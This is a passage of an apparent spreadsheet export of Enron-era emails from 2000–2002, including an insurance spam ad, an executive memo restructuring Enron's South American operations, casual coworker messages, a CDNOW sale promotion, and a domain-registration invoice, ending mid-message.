Carol L. St. Clair  -  FEMALE AGE 40 - PREMIER NONSMOKER ANNUAL PREMIUM:_x000D_
_x000D_
Insurance Amt:  $   250,000    10 Yrs: $155    15 Yrs:  $250    20 Yrs: $282_x000D_
Insurance Amt:  $   500,000    10 Yrs: $250    15 Yrs:  $400    20 Yrs: $465_x000D_
Insurance Amt:  $1,000,000    10 Yrs: $405    15 Yrs:  $690    20 Yrs: $820_x000D_
Insurance Amt:  $2,000,000    10 Yrs: $750    15 Yrs:  $1280    20 Yrs: $1540_x000D_
_x000D_
1.  You can save up to 30% compared to comparable life policies._x000D_
2.  Your annual premium for the first 10, 15 or 20 years is guaranteed._x000D_
3.  The underwriter has met very rigorous standards - Transamerica Occidental Life(A+ rated)._x000D_
_x000D_
To obtain more information please visit our website by simply clicking on http://www.waynedirect.com/atty/ or call us at (800) 461-3305.  Over 1,000 Attorneys have obtained their life insurance through our agency in the last three years alone.  We have placed over $1 Billion of Life Insurance with Transamerica since 1983._x000D_
_x000D_
Wayne Direct Insurance Services_x000D_
_x000D_
Todd L. Wayne, General Agent_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------_x000D_
This message is being sent to you in compliance with the proposed Federal legislation for commercial email (S.1618 - SECTION 301). Pursuant to Section 301, Paragraph (a)(2)(C) of S.1618, further transmissions to you by the sender of this e-mail may be stopped at no cost to you by submitting a request to be removed. INSTRUCTIONS - REPLY with the word 'REMOVE' in the subject line.</t>
  </si>
  <si>
    <t>Sun, 10 Dec 2000 04:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Organizational Changes</t>
  </si>
  <si>
    <t xml:space="preserve">Brett, got it covered._x000D_
_x000D_
thanks_x000D_
Dave_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 12/10/2000=_x000D_
=20_x000D_
12:30 PM ---------------------------_x000D_
_x000D_
_x000D_
Brett R Wiggs@ENRON_x000D_
12/09/2000 11:48 AM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc: =20_x000D_
Subject: Re: Organizational Changes =20_x000D_
_x000D_
Dave:_x000D_
_x000D_
Is there anything else you need for the meeting and do you need me to atten=_x000D_
d?_x000D_
_x000D_
Thanks,_x000D_
Brett_x000D_
_x000D_
_x000D_
_x000D_
David W Delainey@ECT_x000D_
12/08/2000 03:36 PM_x000D_
To: Joe Kishkill/SA/Enron@Enron, Orlando Gonzalez/SA/Enron@Enron_x000D_
cc: Brett R Wiggs/SA/Enron@Enron, Remi Collonges/SA/Enron@Enron, Michael=20_x000D_
Guerriero/SA/Enron@Enron=20_x000D_
Subject: Organizational Changes_x000D_
_x000D_
Guys, I assume that you will have a complete headcount and a revised 2001=_x000D_
=20_x000D_
expense/revenue/capital budget available in the next week or so.  I would=_x000D_
=20_x000D_
also like to know what your HR plan might be given these changes.  David=20_x000D_
Oxley will the help with the HR issues and Wes Colwell with the budget issu=_x000D_
es._x000D_
_x000D_
No turning back gentlemen.  I look forward to great success in the next yea=_x000D_
r._x000D_
_x000D_
Frevert, Whalley, Lavo and myself are sitting down to discuss Electrobolt o=_x000D_
n=20_x000D_
Tuesday morning - subject to that meeting we have approval to go ahead from=_x000D_
=20_x000D_
Skilling. =20_x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 12/08/2000=_x000D_
=20_x000D_
12:25 PM ---------------------------_x000D_
  =20_x000D_
=09_x000D_
=09_x000D_
=09From:  David Delainey, President &amp; CEO Enron Americas @ ENRON           =_x000D_
     =20_x000D_
          12/07/2000 11:53 PM_x000D_
=09_x000D_
_x000D_
Sent by: Enron Announcements@ENRON_x000D_
To: ESA_Employees_x000D_
cc: =20_x000D_
Subject: Organizational Changes_x000D_
_x000D_
On November 8, the Office of the Chairman, issued an important communicatio=_x000D_
n,=20_x000D_
announcing significant organizational changes in Enron's worldwide=20_x000D_
operations. The purpose of this memo is to share with you the decisions tha=_x000D_
t=20_x000D_
are underway to restructure  Enron=01,s operations in South America.  The b=_x000D_
asic=20_x000D_
organizational framework has been set.=20_x000D_
_x000D_
As you know, Diomedes Christodoulou and Jim Bannantine will be assuming new=_x000D_
=20_x000D_
responsibilities within Enron. Replacing them will be Orlando Gonzalez and=_x000D_
=20_x000D_
Joe Kishkill, who will become the Co-Presidents of South America, reporting=_x000D_
=20_x000D_
to Dave Delainey and John Lavorato.  They will share overall responsibility=_x000D_
;=20_x000D_
however, Orlando=01,s focus will be on direct sales origination,=20_x000D_
commercial/government relationships and regulatory issues.  Joe=01,s focus =_x000D_
will=20_x000D_
be on wholesale origination, financial and operating performance and overal=_x000D_
l=20_x000D_
country management.  In addition, Orlando will continue as President and CE=_x000D_
O=20_x000D_
of Elektro until its ultimate sale._x000D_
_x000D_
The existing, large integrated asset base in South America (excluding=20_x000D_
Elektro) will be managed and operated by Rebecca McDonald and Jim Hughes in=_x000D_
=20_x000D_
Enron Global Assets, which is part of Enron Wholesale Services under Mark=_x000D_
=20_x000D_
Frevert. Ultimately, there will be very close coordination in both Brazil a=_x000D_
nd=20_x000D_
Argentina between Enron Americas and Enron Global Assets to ensure that our=_x000D_
=20_x000D_
reputation in South America is protected, our asset positions are being=20_x000D_
managed prudently and that commercial opportunities surrounding these asset=_x000D_
s=20_x000D_
are pursued._x000D_
_x000D_
The remaining natural gas and electrical commercial activities in South=20_x000D_
America will be organized around the highly successful North American netwo=_x000D_
rk=20_x000D_
business model.  This model employs people, market making, physical=20_x000D_
commodities, capital and assets to provide reliable, flexible and high-valu=_x000D_
e=20_x000D_
products to our customers.  It is people and intellectual capital based and=_x000D_
=20_x000D_
enjoys high rates of return on invested capital._x000D_
_x000D_
In the interest of pursuing this strategy, the following teams will report =_x000D_
to=20_x000D_
Joe and Orlando:_x000D_
=20_x000D_
The Commercial Origination team will be lead by Brett Wiggs.  The team will=_x000D_
 =20_x000D_
focus on covering South American markets, primarily Brazilian and Argentine=_x000D_
=20_x000D_
natural gas and electricity, with the following goals:_x000D_
_x000D_
? Generating new, innovative, reliable and high value products and services=_x000D_
=20_x000D_
needed by the market by utilizing our commodity, asset and capital=20_x000D_
capabilities;_x000D_
? Providing those products and services across South America and across the=_x000D_
=20_x000D_
value chain, including wholesale and retail, based upon the highest value=_x000D_
=20_x000D_
opportunity;_x000D_
? Finding structural value arbitrages in the South American market and move=_x000D_
=20_x000D_
quickly to capitalize;_x000D_
? Assisting the Risk Management and Trading organization in managing the=20_x000D_
overall risk of the organization;_x000D_
? Managing all new power and asset development opportunities in South Ameri=_x000D_
ca=20_x000D_
consistent with this strategy, and_x000D_
? Providing the Risk Management and Trading organization information and de=_x000D_
al=20_x000D_
flow._x000D_
_x000D_
The Commercial Origination team will consist of a diverse group of people w=_x000D_
ho=20_x000D_
work as a single team which bring the required skills including commodity,=_x000D_
=20_x000D_
capital, regulatory, asset, development, market, structuring, deal executio=_x000D_
n,=20_x000D_
finance and country knowledge necessary to reach our goals.=20_x000D_
_x000D_
The Trading and Risk Management team will be headed by Remi Collonges.  The=_x000D_
=20_x000D_
team will continue to develop pricing information and manage the price book=_x000D_
=20_x000D_
for the relevant energy markets in support of the wholesale and direct sale=_x000D_
s=20_x000D_
efforts.  Additionally, the team will work toward implementation of activel=_x000D_
y=20_x000D_
trading South American energy commodities.  This group will be responsible=_x000D_
=20_x000D_
for managing Enron South America=01,s overall risk and will have a direct=_x000D_
=20_x000D_
reporting relationship with John Lavorato in his role as head of the Americ=_x000D_
as=20_x000D_
risk activities._x000D_
_x000D_
The Argentine effort will be integrated into the overall South American=20_x000D_
Commercial Origination and Trading and Risk Management groups; however, we=_x000D_
=20_x000D_
will continue to maintain an Argentine office headed by Michael Guerriero. =_x000D_
=20_x000D_
_x000D_
The goal of the reorganization is to create a flat team oriented organizati=_x000D_
on=20_x000D_
that is very market and commercially focused.  The following support=20_x000D_
functions will assist the overall business objectives of the commercial tea=_x000D_
m=20_x000D_
and will report into Joe and Orlando, plus into their line functions in=20_x000D_
Houston.  The overall goal is to ensure that the South American business=20_x000D_
units have an adequate support organization to evaluate opportunities, as=_x000D_
=20_x000D_
well as manage day-to-day business and risk.  Otherwise, the Houston=20_x000D_
infrastructure will provide resources as needed to manage peak requirements=_x000D_
=20_x000D_
in South America, not unlike other businesses in Enron Americas._x000D_
_x000D_
These groups include:_x000D_
_x000D_
The Government Affairs team, which will be headed by Sergio Assad, will=20_x000D_
manage the relationships with the relevant regulatory agencies as well as=_x000D_
=20_x000D_
governmental ministries.  The primary regulatory goal will be to facilitate=_x000D_
,=20_x000D_
in the near term, substantive changes to the regulatory rules to allow a=20_x000D_
functioning wholesale traded market in Brazil and Argentina. Sergio will=20_x000D_
assume his responsibilities upon completion of the Elektro sale.  During th=_x000D_
is=20_x000D_
interim period, Jose Bestard will continue to be in charge of the regulator=_x000D_
y=20_x000D_
function.  Once Sergio makes the transition, he will also report to Rick=20_x000D_
Shapiro in Enron Government Affairs._x000D_
_x000D_
The Finance team will be headed by Britaldo Soares.  The team will manage t=_x000D_
he=20_x000D_
interface with Enron Global Finance.  Britaldo will transition from his=20_x000D_
current duties at Elektro upon completion of the Elektro sale.  Britaldo wi=_x000D_
ll=20_x000D_
also report to Joe Deffner in Enron Global Finance.  Rob Gay will be=20_x000D_
assisting Britaldo during the transition, while continuing his work on the=_x000D_
=20_x000D_
Cuiaba project._x000D_
_x000D_
The Legal team, which will be lead by Randy Young, as general counsel, and=_x000D_
=20_x000D_
John Novak, as deputy general counsel, will manage South America=01,s legal=_x000D_
=20_x000D_
requirements.  Randy and John will also report to Mark Haedicke in Enron=20_x000D_
Wholesale Services - Legal Department._x000D_
_x000D_
Miguel Padron will become Chief of Staff.  Human Resources, Information=20_x000D_
Technology, Treasury, Accounting &amp; Reporting, as well as Administration wil=_x000D_
l=20_x000D_
report to Miguel.  This will bring focus to essential, but non-commercial=_x000D_
=20_x000D_
functions, as well as more efficiently manage key matrix reporting=20_x000D_
relationships with Enron.  Miguel will also report to David Oxley in Enron=_x000D_
=20_x000D_
Wholesale Services =01) Human Resources and Wes Colwell in Enron Wholesale=_x000D_
=20_x000D_
Services =01) Business Analysis and Reporting._x000D_
_x000D_
These changes are consistent with Enron's evolving business strategy and=20_x000D_
reflect our continuing commitment to grow the company by maximizing our=20_x000D_
financial and intellectual capital.  However, in line with the new=20_x000D_
organizational structure and the near term potential for business in the=20_x000D_
region, further budget reductions will be necessary.  People directly=20_x000D_
affected will be notified shortly._x000D_
=20_x000D_
Enron is committed to continue the successful implementation of its=20_x000D_
businesses in South America.  We believe that as the markets develop, we ar=_x000D_
e=20_x000D_
uniquely positioned to leverage Enron=01,s core capabilities and create=20_x000D_
shareholder value.=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 Jan 2002 07:50:15 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">or room service_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Thursday, January 24, 2002 9:50 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
Okay...sounds good! _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, January 24, 2002 9:49 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
i figured you might, well go for lunch_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Thursday, January 24, 2002 9:48 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
maybe around 10:30 or 11:00.  You know I'm going to want to eat.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, January 24, 2002 9:45 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
ok good, let me know when you want to leave_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Thursday, January 24, 2002 9:45 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
DUH!!  I want company.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, January 24, 2002 9:44 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
let me know if you want company_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Thursday, January 24, 2002 9:44 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I think we have to be there at 2:00. But I was thinking about leaving early to go shopping or eat or something. _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, January 24, 2002 9:41 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
i think so, what time are you supposed to go_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Thursday, January 24, 2002 9:40 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
It's about your benefits and crap like that...You have to fill out all of these forms and stuff.  Did you get a packet of stuff to fill out?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, January 24, 2002 9:39 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
do you know what its about_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Thursday, January 24, 2002 9:39 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
Ok...I am pretty pissed off about having to go, but I don't want to get in trouble for not going. _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, January 24, 2002 9:37 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
if you dont let me know_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Thursday, January 24, 2002 9:34 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I don't know yet.  We'll just have to see. _x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, January 24, 2002 9:32 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
you too, so are you going to go to the meeting_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Thursday, January 24, 2002 9:32 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I was thinking about that this morning on my way in.  You look really nice today! _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, January 24, 2002 9:30 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
i dont realy think so but what do i know, by the way its a really ugly day out there_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Thursday, January 24, 2002 9:27 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
I thought we had to go?  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, January 24, 2002 9:26 AM_x000D_
To:	Rybarski, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
i dont know are you?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rybarski, Amanda  _x000D_
Sent:	Thursday, January 24, 2002 9:11 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
Are you going to that lame ass orientation today at the Houstonian?_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 23:07:53 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'2.4108.91-lltl_pakcfbp.1@cda01.cdnow.com'})</t>
  </si>
  <si>
    <t>SAVE Big - CDNOW Clearance Sale!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Dear Michael,_x000D_
_x000D_
Save! Save! Save! CDNOW's Annual Clearance Sale is here! Hundreds of CDs are now reduced to $9.99 and $7.99! But wait, there's more... Movies are also reduced, DVDs to $15.99, and VHS are now $11.99. Browse through your favorite genres to find the biggest savings of the year. This sale won't last long!_x000D_
_x000D_
 *CDNOW Clearance Sale!_x000D_
 *Top 50 Selling DVDs_x000D_
 *Own the Ultimate Box Sets!_x000D_
 *American Music Awards_x000D_
_x000D_
----------------------------------------------------_x000D_
CLEARANCE SALE -- $7.99-$9.99 CDs, $11.99 VHS, $15.99 DVDs_x000D_
Now through February 4, 2002 hundreds of CDs with a suggested retail price of $11.97-$11.99 are reduced to $9.99.  CDs that were $9.97-$9.99 are now only $7.99. DVDs with a suggested retail price of $19.98 are just $15.99, and VHS titles that were $14.98 are now $11.99._x000D_
CDNOW is cleaning house and passing the year's biggest savings on to you-so hurry!_x000D_
_x000D_
_x000D_
_x000D_
http://cdw01.cdnow.com/Click?q=4e-0Y45InZlaZMVi0kInPnT0m2AndRR_x000D_
_x000D_
_x000D_
_x000D_
Top 50 Selling DVDs_x000D_
Visit CDNOW to take a peek at our list of top-selling DVDs! This is the place to find in-demand titles like "Pearl Harbor," "American Pie2," "Oceans 11," "Moulin Rouge," "The Fast and the Furious," and many more! Own the hottest movies today when you visit._x000D_
_x000D_
_x000D_
_x000D_
http://cdw01.cdnow.com/Click?q=8e-Ve8cQCninhtYM4XPycvWkaMAE9RR_x000D_
_x000D_
_x000D_
_x000D_
Own the Ultimate Box Sets!_x000D_
You'll get more for your money when you buy box sets from CDNOW's vast collection. Movie/TV sets like "The Godfather Collection, "Best of Hitchcock", "Sopranos", "Planet of the Apes", "Friends," X-Files," and many more?_x000D_
_x000D_
Amazing music sets from "Louis Armstrong", Creedence Clearwater Revival," "Grateful Dead"? check out the music genre of your choice?_x000D_
_x000D_
_x000D_
_x000D_
http://cdw01.cdnow.com/Click?q=cd-VHfSQzsMFUKa9nOFrp9_FqcbodRR_x000D_
_x000D_
_x000D_
_x000D_
American Music Award Winners_x000D_
Michael Jackson was honored as the Artist of the Century at the American Music Awards, while Alicia Keys, Tim McGraw, Aaliyah, and Destiny's Child were all double winners. Explore your favorite award-winners..._x000D_
_x000D_
_x000D_
http://cdw01.cdnow.com/Click?q=0c-_Y2DIc8fFgpCK00Wyou27S-l6sRR_x000D_
_x000D_
......................................................................_x000D_
The prices of the items featured in this e-mail were accurate at the_x000D_
time the e-mail was sent, but may be subject to change._x000D_
_x000D_
You received this email because you are an account holder at CDNOW._x000D_
If you'd prefer not to receive this weekly Special Offers message_x000D_
in the future, click on the link below:_x000D_
http://cdw01.cdnow.com/Click?q=21-UPiOzEdsDFiDS_mo8Ovo8Ll1jsRR_x000D_
_x000D_
Or, if you'd like to receive different information from us, you can_x000D_
always update your music preferences by simply going to the MY CDNOW_x000D_
Preferences page at:_x000D_
http://cdw01.cdnow.com/Click?q=36-wgY-IiIvmhKRf2UMhzE3r09INdRR_x000D_
_x000D_
For questions regarding your account, order status or to contact our_x000D_
Customer Service department, please visit our Help Desk._x000D_
http://cdw01.cdnow.com/Click?q=4b-k_F7IBUpW_Wb3RUP5683vub5nRRR_x000D_
......................................................................_x000D_
SO:8015327_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 02:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Financial Trading Agreement Database Link</t>
  </si>
  <si>
    <t xml:space="preserve">Tana:  Thanks.  Sara_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
	Tana Jones_x000D_
	01/22/2001 10:21 AM_x000D_
		 _x000D_
		 To: Karla Compean/HOU/ECT@ECT, Mike Kelly/EWC/Enron@ENRON, Doug _x000D_
Sewell/HOU/ECT@ECT, Edward D Baughman/HOU/ECT@ECT, Terri Clynes/HOU/ECT@ECT, _x000D_
Oscar Dalton/HOU/ECT@ECT, Gary Justice/NA/Enron@Enron, Steve _x000D_
Wang/NA/Enron@Enron_x000D_
		 cc: Sara Shackleton/HOU/ECT@ECT_x000D_
		 Subject: Financial Trading Agreement Database Link_x000D_
_x000D_
At the request of Sara Shackleton, I am attaching the link that will provide _x000D_
you access the the financial trading agreement database.  Please call me if _x000D_
you have any questions about the information contained in the database._x000D_
_x000D_
Link --&gt;_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Weekly Priority Mtg./Raetta</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	Weekly Priority Mtg./Raetta_x000D_
_x000D_
Date:		3/29/2001_x000D_
Time:		9:30 AM - 10:30 AM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Tue, 18 Dec 2001 16:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'invoice@register.com'})</t>
  </si>
  <si>
    <t>frozenset({'louise@enron.com'})</t>
  </si>
  <si>
    <t>Invoice for ubsenergy.com</t>
  </si>
  <si>
    <t xml:space="preserve">				Date: 	19-Dec-2001_x000D_
_x000D_
Thank you for using register.com, your first step on the web_x000D_
The following domain name(s) have been successfully registered:_x000D_
_x000D_
ubsenergy.com_x000D_
----------------------------------------------------------------------------------------------------------------------------------------_x000D_
_x000D_
_x000D_
INVOICE_x000D_
_x000D_
Louise Nettelton_x000D_
2137 Chilton Road_x000D_
Houston, TX 77019_x000D_
US_x000D_
_x000D_
Customer Order Code: 6968345_x000D_
_x000D_
FROM:_x000D_
Register.com_x000D_
575 8th Avenue_x000D_
New York,  NY 10018_x000D_
United States_x000D_
_x000D_
Billing Inquiries:_x000D_
_x000D_
Phone:  Toll free in the U.S. and Canada: (800) 899-9723_x000D_
        Outside the U.S. and Canada: +1 (902) 742-1466_x000D_
_x000D_
Online: http://www.register.com/create_ticket.cgi_x000D_
_x000D_
_x000D_
	E-MAIL INVOICE FOR DOMAIN REGISTRATION/RENEWAL_x000D_
_x000D_
Please see attached detailed instructions and registration_x000D_
agreement._x000D_
_x000D_
Register.com is in receipt of valid  credit card information_x000D_
for payment and confirms the following:_x000D_
_x000D_
Domain Name:             ubsenergy.com_x000D_
Subscription Length:     2 year(s)_x000D_
Period From:             19-Dec-2001_x000D_
Period To:               18-Dec-2003_x000D_
Order ID:                20212527_x000D_
Amount Charged (US$):    $70.00_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--------------------------------------------------------------_x000D_
Registrant agrees to the terms and conditions of the current_x000D_
Services Agreement found at_x000D_
http://www.register.com/service-agreement.cgi_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Aug 2001 08:09:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Catch Up</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Joseph T Pokalsky &lt;energy.vertical@juno.com&gt;@ENRON [mailto:IMCEANOTES-Joseph+20T+20Pokalsky+20+3Cenergy+2Evertical+40juno+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Tuesday, August 14, 2001 9:56 AM_x000D_
To:	vkamins@ect.enron.com_x000D_
Subject:	Catch Up_x000D_
_x000D_
Vince:_x000D_
_x000D_
Rumors about the next really big reorg at Enron got me to thinking about_x000D_
you.  Hope all is well with you and your family and that Vincent is_x000D_
enjoying his new job.  Will you be attending the Risk conference in_x000D_
September?  Take care. Joe._x000D_
_x000D_
Joseph T. Pokalsky_x000D_
Energy Vertical Analysis, LLC_x000D_
Office:  404-350-8562_x000D_
Cell:     404-456-5173_x000D_
Fax:      413-691-5614</t>
  </si>
  <si>
    <t>Thu, 20 Sep 2001 17:01:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: The aftermath of September 11th -- Enron Government Affairs</t>
  </si>
  <si>
    <t xml:space="preserve">Rick:=20_x000D_
_x000D_
I really appreciate your note.  Beth continues to have concerns with the no=_x000D_
tion of me getting on an airplane ... a fact that comes out in interesting =_x000D_
ways during the day.  Thank you for giving us an opportunity to let the dis=_x000D_
comfort pass or lessen. =20_x000D_
_x000D_
It's always been hard to determine what is essential vs. nonessential trave=_x000D_
l.  Our jobs involve personal touch and contact.  We can't stay off of airp=_x000D_
lanes for very long without compromising some of our effectiveness.  On the=_x000D_
 positive side, very few of our elected friends outside of California are e=_x000D_
ven thinking about energy issues._x000D_
_x000D_
I've done a good job of clearing the calendar for the next two weeks, but I=_x000D_
'm already booking trips the first week of October.  Hopefully the world wi=_x000D_
ll be calm during the interim and we can all get back to some semblance of =_x000D_
normalcy. =20_x000D_
_x000D_
Paul_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Dernehl, Ginger   On Behalf Of Shapiro, Richard_x000D_
Sent:=09Thursday, September 20, 2001 2:52 PM_x000D_
To:=09O'connell, Earlene; Barnes, Lynnette; Reyna, Margo; Perez, Gus; Steph=_x000D_
ens, Sharonda; Lawrence, Linda L.; Alamo, Joseph; Allegretti, Daniel; Allen=_x000D_
, Joe; Alvarez, Ramon; Arefieva, Maria; Assad, Sergio; Assaf, Lisa; Bellas,=_x000D_
 Kirsten; Benson, Eric; Bestard, Jose; Binns, Darran; Bolton, Scott; Boston=_x000D_
, Jerry; Boston, Roy; Braz, Gisele; Briggs, Tom; Buerger, Rubena; Burns, St=_x000D_
ephen; Canovas, Guillermo; Cantrell, Rebecca W.; Chan, Stella; Comnes, Alan=_x000D_
; Connor, Joe; Cooney, Carolyn; Crowther, Mark; Dadson, Aleck; Dasovich, Je=_x000D_
ff; Davies, Philip; Dawson, Paul; Decker, Larry; Dernehl, Ginger; Devlin, B=_x000D_
rendan; Dindarova, Nailia; Dressler, Jean; Duvauchelle, Antoine; Elms, Nick=_x000D_
; Fitzgibbon, Tom; Florio, Viviana; Floris, Vinio; Frank, Robert; Fromer, H=_x000D_
oward; Fulton, Donna; Gaillard, Bruno; Glen, Merle; Grimes, Michael; Guerre=_x000D_
ro, Janel; Haizmann, Jan; Hamilton, Allison; Hardy Jr, John; Hawkins, Berna=_x000D_
dette; Hemstock, Robert; Hennemeyer, Paul; Hetrick, Nancy; Hoatson, Tom; Hu=_x000D_
ang, Karen; Huertas, Alfredo; Hueter, Barbara A.; Hughes, Llewelyn; Hunter,=_x000D_
 Bevin; Huson, Margaret; Hussain, Mustafa; Ibrahim, Amr; Imai, Makiko; Inge=_x000D_
rsoll, Richard; Irwin, Kerryann; Kaufman, Paul; Kean, Steven J.; Keenan, Am=_x000D_
ber; Keene, Patrick; Kimura, Takashi; Kingerski, Harry; Kishigami, Kikumi; =_x000D_
Knight, Laurie; Landwehr, Susan M.; Lassere, Donald; Lawner, Leslie; Leibma=_x000D_
n, Lara; Leonardo, Sam; Levy, Alberto; Linnell, Elizabeth; Mara, Susan; Mau=_x000D_
rer, Luiz; McVicker, Maureen; Migden, Janine; Milano, Pamela; Miller, Terri=_x000D_
; Montovano, Steve; Nersesian, Carin; Neustaedter, Robert; Nicolay, Christi=_x000D_
 L.; Nord, Sue; Noske, Linda J.; Novosel, Sarah; O'Day, Nicholas; Ogenyi, G=_x000D_
loria; Ozegalska, Justyna; Palmer, Germain; Perez, Carmen; Perrino, Dave; P=_x000D_
etrochko, Mona L.; Pharms, Melinda; Reblitz, Scott; Reis, Jose Lucio; Rishe=_x000D_
, Frank; Rizzo, Helen; Roan, Michael; Robertson, Linda; Robinson, Marchris;=_x000D_
 Rodriquez, Andy; Ryall, Jean; Sampaio, Fred; Lindberg, Susan; Shapiro, Ric=_x000D_
hard; Shelk, John; Shortridge, Pat; Staines, Dan; Steffes, James D.; Strans=_x000D_
ky, Joan; Stroup, Kerry; Styles, Peter; Sullivan, Kathleen; Sullivan, Lora;=_x000D_
 Thome, Jennifer; Tiberi, Fino; Tracy, Lysa; Twiggs, Thane; Van Biert, Teun=_x000D_
; Walton, Steve; Warner, Geriann; Watanabe, Mika; Wood, Doug; Xi, Xi; Yeung=_x000D_
, Charles; Yoho, Lisa_x000D_
Subject:=09The aftermath of September 11th -- Enron Government Affairs_x000D_
_x000D_
_x000D_
    The events of September 11th are still very much with us and will conti=_x000D_
nue to be for some time, perhaps for as long as we live. For those who have=_x000D_
 not heard me say this regarding air travel,individuals should avail themse=_x000D_
lves of the travel services the company is offering in the way of guidance =_x000D_
for those that are traveling and only travel by air for essential matters( =_x000D_
until further notice). In addition, anyone who is currently  uncomfortable =_x000D_
with the notion of air travel  need not do so...we will work around this fo=_x000D_
r as long as the need exists. The company has also provided information on =_x000D_
the availability of counseling services should anyone have the need- please=_x000D_
 contact HR or the Benefits Group for further information._x000D_
     A final couple of notes: If there is a silver lining in the events of =_x000D_
September 11th, it is the kindness, generosity, and humanity it brings out =_x000D_
in the rest of us...I have seen this play out in untold ways in our "group"=_x000D_
,both in London and at home,  over the last nine days , including( to a per=_x000D_
son) the absence of any hint of bias being shown towards the individual in =_x000D_
our group who is an "Arab American" and a Muslim, Amr Ibrahim. My high rega=_x000D_
